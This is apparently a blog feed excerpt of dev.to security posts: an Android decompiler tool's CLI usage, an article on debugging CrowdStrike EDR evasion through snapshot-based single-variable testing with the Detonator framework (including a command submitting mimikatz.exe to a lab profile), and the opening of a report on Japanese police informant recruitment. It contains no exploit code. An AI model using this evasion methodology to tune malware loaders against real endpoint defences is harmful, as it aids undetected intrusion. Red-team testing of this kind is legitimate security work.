&lt;p&gt;&lt;a href="https://github.com/user-attachments/assets/4c4a6813-8561-490c-a573-ef113da861b6" rel="noopener noreferrer"&gt;https://github.com/user-attachments/assets/4c4a6813-8561-490c-a573-ef113da861b6&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Launch the GUI with a single command:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python main.py app.apk &lt;span class="nt"&gt;--gui&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within the GUI, one can browse by package name, perform global searches for strings, types, methods, and fields, click to view decompiled source code, and benefit from identifier renaming, theme switching, and Manifest viewing—essentially a “second-generation jadx-gui”.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Command-Line Extraction of a Single Class
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python main.py getclass app.apk Lcom/poc/Main&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; Main.java
python main.py getclass app.apk com.poc.Main &lt;span class="nt"&gt;--threads&lt;/span&gt; 16
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Class names support common notations such as &lt;code&gt;com.poc.Main&lt;/code&gt;, and the tool automatically converts them to Dalvik descriptors.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Global Reference Search (&lt;code&gt;findrefs&lt;/code&gt;)
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python main.py findrefs app.apk string token &lt;span class="nt"&gt;-o&lt;/span&gt; string_refs.txt
python main.py findrefs app.apk &lt;span class="nb"&gt;type &lt;/span&gt;com.poc.Main
python main.py findrefs app.apk method onCreate &lt;span class="nt"&gt;--class&lt;/span&gt; com.poc.Main
python main.py findrefs app.apk method notify &lt;span class="nt"&gt;--class&lt;/span&gt; openclaw &lt;span class="nt"&gt;--fuzzy-class&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; method_refs.txt
python main.py findrefs app.apk field changeQuickRedirect &lt;span class="nt"&gt;-o&lt;/span&gt; field_refs.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;string&lt;/code&gt; and &lt;code&gt;type&lt;/code&gt; perform fuzzy matching. For &lt;code&gt;method&lt;/code&gt; and &lt;code&gt;field&lt;/code&gt;, the class name may be omitted for a global search, or &lt;code&gt;--class&lt;/code&gt; can be combined with &lt;code&gt;--fuzzy-class&lt;/code&gt; for fuzzy class name limitation. &lt;code&gt;-o&lt;/code&gt; writes results to disk, &lt;code&gt;--threads&lt;/code&gt; controls concurrency, and &lt;code&gt;--debug&lt;/code&gt; outputs timing for each stage.&lt;/p&gt;

&lt;h2&gt;
  
  
  Value in Penetration Testing
&lt;/h2&gt;

&lt;p&gt;For penetration testers, red teams, and mobile SRC participants, Droid ASC transforms the most tedious waiting period—from unpacking to obtaining results—into a matter of seconds. In pay-per-vulnerability environments, this saved time is directly convertible into revenue. Five specific benefits are evident:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rapid Extraction of Hardcoded Secrets&lt;/strong&gt; – Hardcoded keys, API addresses, and encryption salts that previously required eight minutes of waiting can now be retrieved in two seconds. During asset screening, this gap widens to hours, yielding more testable surfaces and more vulnerabilities.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Low-Cost Machines Can Handle Difficult Targets&lt;/strong&gt; – With 141 MB memory usage compared to jadx’s 13.2 GB, Droid ASC runs on cloud hosts, old laptops, and containers. OOM failures no longer deter testing, and there is no need to provision additional machines for each unpacking operation.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Natural Affinity for R8-Obfuscated Products&lt;/strong&gt; – Most mainstream APKs are processed by R8. Droid ASC directly leverages the physical layout optimised by R8, meaning the more “regularised” the code, the faster the search. There is no longer a need to guess names and rely on luck.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Rapid Mapping of API Attack Surface&lt;/strong&gt; – Using type and method searches to locate network layers and business interface classes, combined with &lt;code&gt;getclass&lt;/code&gt; to extract target class source code in seconds, the speed of producing an interface list directly determines the testing rhythm. The number of assets covered within a given window doubles.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Trace-Free Analysis&lt;/strong&gt; – Zero preprocessing, zero disk cache, and stateless operation make Droid ASC particularly suitable for emergency response and forensic scenarios involving classified samples. No index files are left behind after delivery.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Old rules apply:&lt;/strong&gt; the above techniques should only be used in &lt;strong&gt;authorised testing and legal research&lt;/strong&gt; scenarios.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The value of Droid ASC lies not merely in being a “faster jadx”, but in introducing a new working paradigm: a decompiler need not be a bloated indexing tool; it can be an engine for on-demand queries. Every minute saved is a minute available to examine another interface and discover another vulnerability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Project Address:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
&lt;a href="https://github.com/MG1937/ASC" rel="noopener noreferrer"&gt;https://github.com/MG1937/ASC&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Article:&lt;/strong&gt;&lt;br&gt;
&lt;a href="https://excalibra.github.io/posts/2026/20260912-droid-asc-android-reverse-engineering-tool/" rel="noopener noreferrer"&gt;https://excalibra.github.io/posts/2026/20260912-droid-asc-android-reverse-engineering-tool/&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
The procedures and technical methods contained in this paper are intended solely for legal and compliant security research and teaching scenarios, with the aim of enhancing network security protection capabilities. They possess clear technical research attributes. Any unit or individual that uses the content of this article for illegal purposes such as attack or destruction without authorisation shall bear all legal liability, civil compensation, and joint liability independently; this site assumes no joint liability.&lt;/p&gt;

</description>
      <category>android</category>
      <category>cybersecurity</category>
      <category>security</category>
      <category>vulnerabilities</category>
    </item>
    <item>
      <title>Constructing a CrowdStrike EDR Evasion Debugging Pipeline</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Wed, 02 Sep 2026 21:11:00 +0000</pubDate>
      <link>https://dev.to/excalibra/constructing-a-crowdstrike-edr-evasion-debugging-pipeline-pp3</link>
      <guid>https://dev.to/excalibra/constructing-a-crowdstrike-edr-evasion-debugging-pipeline-pp3</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Article Summary:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
This article argues that EDR evasion testing does not depend on access to a cloud management console. Instead, the core requirement is a reproducible test environment employing single-variable controlled experiments to pinpoint detection triggers. It introduces the open‑source Detonator framework for automated EDR testing, supporting CrowdStrike and other major EDRs. The methodology emphasises a snapshot‑per‑run and one‑variable‑per‑test approach, and the article also notes the availability of authorised EDR test tokens.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Categories:&lt;/strong&gt; Cybersecurity, Red Teaming, Security Tools&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Executive Summary
&lt;/h2&gt;

&lt;p&gt;This briefing addresses a common challenge faced by red team practitioners: testing a new loader against a CrowdStrike‑protected endpoint without access to the cloud‑based Falcon console. Many assume that the absence of logs renders testing futile. However, the author contends that the console provides only a conclusion (whether the sample was killed), whereas what the tester truly needs is the point of failure in the attack chain. By adopting a reproducible, single‑variable testing methodology—supported by the Detonator framework—one can systematically isolate the specific API call or technique that triggers detection, independent of console logs. This approach transforms debugging from a blind guessing game into a rigorous scientific process.&lt;/p&gt;

&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;Consider the following scenario: you have obtained a CrowdStrike endpoint with the sensor online and fully operational. You are ready to test a loader that you have been refining for three weeks.&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F063f13c2-1f9e-4e39-8edf-0e19accc2cb6" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F063f13c2-1f9e-4e39-8edf-0e19accc2cb6" width="760" height="332"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;Then you realise—&lt;strong&gt;you have no cloud console&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;No logs, no detection strings, no rule triggers.&lt;/p&gt;

&lt;p&gt;The immediate reaction is often panic: "How can I test without visibility?" But the central thesis of this article is that the console is not as indispensable as it seems. The true value lies not in receiving a binary verdict, but in understanding &lt;em&gt;where&lt;/em&gt; and &lt;em&gt;why&lt;/em&gt; the detection occurred.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Console: A Mere Reporter of Results
&lt;/h2&gt;

&lt;p&gt;What does the console actually provide? A polished interface showing a log entry: "Process terminated due to rule X." But that conclusion is merely a starting point. The real work—changing a parameter, re‑executing, and observing the outcome—remains manual. The console never explains the &lt;em&gt;process&lt;/em&gt;: which API call was made, at which stage of the kill chain the failure occurred.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Six Stages of Detection
&lt;/h2&gt;

&lt;p&gt;To perform effective debugging, one must systematically examine each phase of execution. The following table outlines the key questions at each stage:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Stage&lt;/th&gt;
&lt;th&gt;Question to Ask&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;File Dropping&lt;/td&gt;
&lt;td&gt;Is the alert triggered upon writing to disk, or only during execution?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Process Startup&lt;/td&gt;
&lt;td&gt;Is the parent process chain anomalous? Are startup parameters suspicious?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory Operations&lt;/td&gt;
&lt;td&gt;Which call fails: VirtualAlloc, VirtualProtect, WriteProcessMemory?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Execution Flow Transfer&lt;/td&gt;
&lt;td&gt;Is it APC injection, thread hijacking, callback, or SetWindowsHookEx?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;C2 Communication&lt;/td&gt;
&lt;td&gt;Is outbound traffic flagged by DNS or HTTPS JA3 fingerprinting?&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Persistence&lt;/td&gt;
&lt;td&gt;Is the Run key write blocked, or is a scheduled task intercepted?&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Notably, &lt;strong&gt;none of these answers come from console logs&lt;/strong&gt;. They are derived from carefully designed controlled experiments.&lt;/p&gt;

&lt;h2&gt;
  
  
  Single‑Variable Testing: The Only Scientific Approach
&lt;/h2&gt;

&lt;p&gt;Effective EDR debugging hinges on a methodical, scientific approach: &lt;strong&gt;change only one parameter at a time&lt;/strong&gt;.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Modify the encryption algorithm while keeping everything else constant → observe EDR reaction.&lt;/li&gt;
&lt;li&gt;Change the injection technique while holding all else fixed → observe.&lt;/li&gt;
&lt;li&gt;Alter the C2 protocol while preserving the rest → observe.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The moment a single alteration flips the detection outcome, you have identified the specific trigger. This pinpoints the exact system call that requires adjustment, rather than forcing a wholesale rewrite of the loader.&lt;/p&gt;

&lt;p&gt;However, this methodology carries a critical prerequisite: &lt;strong&gt;reproducibility&lt;/strong&gt;.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Importance of Reproducibility: EDR Has Memory
&lt;/h2&gt;

&lt;p&gt;Attempting to run multiple samples on the same machine in succession is flawed because EDRs retain state:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Cached detection results.&lt;/li&gt;
&lt;li&gt;Local behavioural models that evolve.&lt;/li&gt;
&lt;li&gt;Continuous scoring of processes over time.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Running a second sample may yield a detection not because of its own behaviour, but because the first sample has already sensitised the EDR. Hence, each test must start from a clean snapshot—same baseline, only one variable in motion.&lt;/p&gt;

&lt;h2&gt;
  
  
  Detonator: Automating the Debugging Pipeline
&lt;/h2&gt;

&lt;h3&gt;
  
  
  What Is Detonator?
&lt;/h3&gt;

&lt;p&gt;Detonator is an open‑source framework designed to automate EDR testing. Its workflow is straightforward:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;You submit a sample → Detonator controller → sends it to a virtual machine with the EDR installed → executes → collects detection results → returns a report.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F33b94a2c-71dd-40c3-9566-ed7357661888" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F33b94a2c-71dd-40c3-9566-ed7357661888" width="1075" height="546"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F434d6ca8-ef99-420a-9ffd-2aa6b3faeb80" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F434d6ca8-ef99-420a-9ffd-2aa6b3faeb80" width="876" height="785"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;Detonator supports Defender, Defender for Endpoint, Elastic Defend, &lt;strong&gt;CrowdStrike&lt;/strong&gt;, Fibratus, RedEdrd, and other major EDRs.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Environment Preparation
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Install the Detonator controller&lt;/strong&gt; (on any Linux or Windows machine):
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;   pip &lt;span class="nb"&gt;install &lt;/span&gt;uv
   uv venv
   &lt;span class="nb"&gt;source&lt;/span&gt; .venv/bin/activate
   uv pip &lt;span class="nb"&gt;install&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; requirements.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Prepare a test virtual machine&lt;/strong&gt;: install Windows, install the CrowdStrike Falcon sensor, and take a clean snapshot.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Install DetonatorAgent&lt;/strong&gt; inside the VM using the provided automation script &lt;code&gt;setup_detonator_windows.ps1&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Step 2: Configure EDR Integration
&lt;/h3&gt;

&lt;p&gt;Edit &lt;code&gt;profiles_init.yaml&lt;/code&gt; and add a CrowdStrike profile:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;crowdstrike-lab&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Crowdstrike&lt;/span&gt;
  &lt;span class="na"&gt;comment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;My CrowdStrike test environment&lt;/span&gt;
  &lt;span class="na"&gt;port&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;8080&lt;/span&gt;
  &lt;span class="na"&gt;vm_ip&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;192.168.1.100&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Step 3: Execute a Test
&lt;/h3&gt;

&lt;p&gt;Submit a sample:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;python &lt;span class="nt"&gt;-m&lt;/span&gt; detonatorcmd &lt;span class="nt"&gt;--profile&lt;/span&gt; crowdstrike-lab mimikatz.exe
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The output will directly inform you of the detection result and the specific rule triggered. For more realistic scenarios, the AutoIt mode can simulate file‑manager navigation, paste operations, and keypresses—even Clickfix‑style attack chains can be evaluated.&lt;/p&gt;

&lt;h2&gt;
  
  
  So, Is the CrowdStrike Console Really Necessary?
&lt;/h2&gt;

&lt;p&gt;Returning to the original question: if you have a CrowdStrike endpoint without the cloud console, is testing still feasible?&lt;/p&gt;

&lt;p&gt;The console’s only function is to announce detection outcomes. That function is precisely the least critical part of a reproducible testing methodology. What you truly need is &lt;strong&gt;the precise point of failure&lt;/strong&gt;, not the fact that failure occurred. That knowledge comes from:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;The sensor being online and enforcing blocks—the sample being killed is observable locally.&lt;/li&gt;
&lt;li&gt;Detonator ensuring a clean snapshot for each run.&lt;/li&gt;
&lt;li&gt;Iterative single‑variable changes—the moment the detection status flips reveals the exact trigger.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The cloud console provides logs; reproducible testing identifies the point of failure. &lt;strong&gt;The former is not essential.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you require a CrowdStrike endpoint to set up such a testing pipeline, we offer authorised EDR endpoint tokens for a range of platforms including SentinelOne, Trend Micro, CrowdStrike, and others, enabling realistic attack‑defence simulation environments.&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Ff186c7a5-9059-4b03-bc42-83fd635c1e64" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Ff186c7a5-9059-4b03-bc42-83fd635c1e64" width="760" height="519"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F93b8e991-fa05-4f06-9bf0-3f534d0c07df" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F93b8e991-fa05-4f06-9bf0-3f534d0c07df" width="760" height="344"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F54146862-05a7-4332-b70f-55085c121175" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F54146862-05a7-4332-b70f-55085c121175" width="982" height="804"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F58cb0744-9800-4595-97f5-28e65b18e78a" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F58cb0744-9800-4595-97f5-28e65b18e78a" width="760" height="402"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fc14fad70-a72b-4beb-a936-e6112570e1a6" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fc14fad70-a72b-4beb-a936-e6112570e1a6" width="1080" height="498"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fb8cfdb76-4831-41f0-9fc5-e7226642aa73" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fb8cfdb76-4831-41f0-9fc5-e7226642aa73" width="760" height="270"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F026978ed-14b8-4604-9144-f37d904132e2" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F026978ed-14b8-4604-9144-f37d904132e2" width="1080" height="340"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fb8d20c5b-a987-4fb3-98fc-74106617327e" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2Fb8d20c5b-a987-4fb3-98fc-74106617327e" width="769" height="543"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F2213b5d8-5e66-4379-96ad-ddd04d825b1d" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F2213b5d8-5e66-4379-96ad-ddd04d825b1d" width="760" height="550"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;h2&gt;
  
  
  Concluding Remarks
&lt;/h2&gt;

&lt;p&gt;The absence of a cloud console does not equate to blind testing. What you lack is not logs, but &lt;strong&gt;a reproducible, snapshot‑based, single‑variable testing discipline&lt;/strong&gt;. The console gives you the &lt;em&gt;outcome&lt;/em&gt;; reproducible testing gives you the &lt;em&gt;root cause&lt;/em&gt;. And discovering the root cause is the essence of effective EDR evasion debugging—anything less is mere conjecture.&lt;/p&gt;

&lt;p&gt;
  &lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F30696f81-13d4-4cc8-a334-1fd70528540e" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub.com%2Fuser-attachments%2Fassets%2F30696f81-13d4-4cc8-a334-1fd70528540e" width="760" height="1224"&gt;&lt;/a&gt;
&lt;/p&gt;

&lt;p&gt;Original Post URL: &lt;a href="https://excalibra.github.io/posts/2026/20260902-crowdstrike-edr-evasion-debugging-pipeline/" rel="noopener noreferrer"&gt;https://excalibra.github.io/posts/2026/20260902-crowdstrike-edr-evasion-debugging-pipeline/&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Categories:&lt;/strong&gt; Cybersecurity, Red Teaming, Security Tools&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tags:&lt;/strong&gt; edr-evasion, crowdstrike, detonator, debugging, red-teaming, reproducible-testing&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
The techniques and methods described herein are intended solely for legitimate security research and educational purposes, with the aim of improving cybersecurity defences. Any unauthorised use of this content for malicious purposes is strictly prohibited. The author and publisher assume no liability for any misuse. All content is shared for technical exchange.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>debugging</category>
      <category>evasion</category>
      <category>redteam</category>
    </item>
    <item>
      <title>Japanese Police Disclosure of 'Chance Encounter' Recruitment of Industrial Espionage Informants – Warning for Enterprises and Personnel in Japan</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Sat, 29 Aug 2026 22:18:08 +0000</pubDate>
      <link>https://dev.to/excalibra/japanese-police-disclosure-of-chance-encounter-recruitment-of-industrial-espionage-informants--3h1j</link>
      <guid>https://dev.to/excalibra/japanese-police-disclosure-of-chance-encounter-recruitment-of-industrial-espionage-informants--3h1j</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxridt9g8g4kz22m05us8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxridt9g8g4kz22m05us8.png" alt=" " width="800" height="446"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Executive Summary
&lt;/h2&gt;

&lt;p&gt;This report examines recently disclosed operational methods employed by Japanese law enforcement agencies to counter industrial espionage, focusing on the systematic use of "chance encounters" to identify and develop informants. The analysis highlights the techniques used to target employees of technology-focused enterprises, with the objective of providing a risk assessment and actionable countermeasures for businesses and their personnel operating within Japan.&lt;/p&gt;

&lt;p&gt;The disclosure of these methods by the Tokyo Metropolitan Police Department's Public Security Bureau serves a dual purpose: not only to inform the corporate sector but also to act as a deterrent by reducing the efficacy of these covert operations through increased public awareness.&lt;/p&gt;

&lt;h2&gt;
  
  
  The "Chance Encounter" Methodology
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Initial Contact and Relationship Cultivation
&lt;/h3&gt;

&lt;p&gt;Disclosed case studies reveal a highly consistent pattern of operation, often commencing with casual approaches in public settings. One illustrative example describes a senior manager of a telecommunications firm being approached in Tokyo's Shinbashi district by an unknown individual inquiring about local dining recommendations. This ostensibly innocuous interaction was, in reality, the first stage of a long-term surveillance operation designed to facilitate an apparently coincidental meeting.&lt;/p&gt;

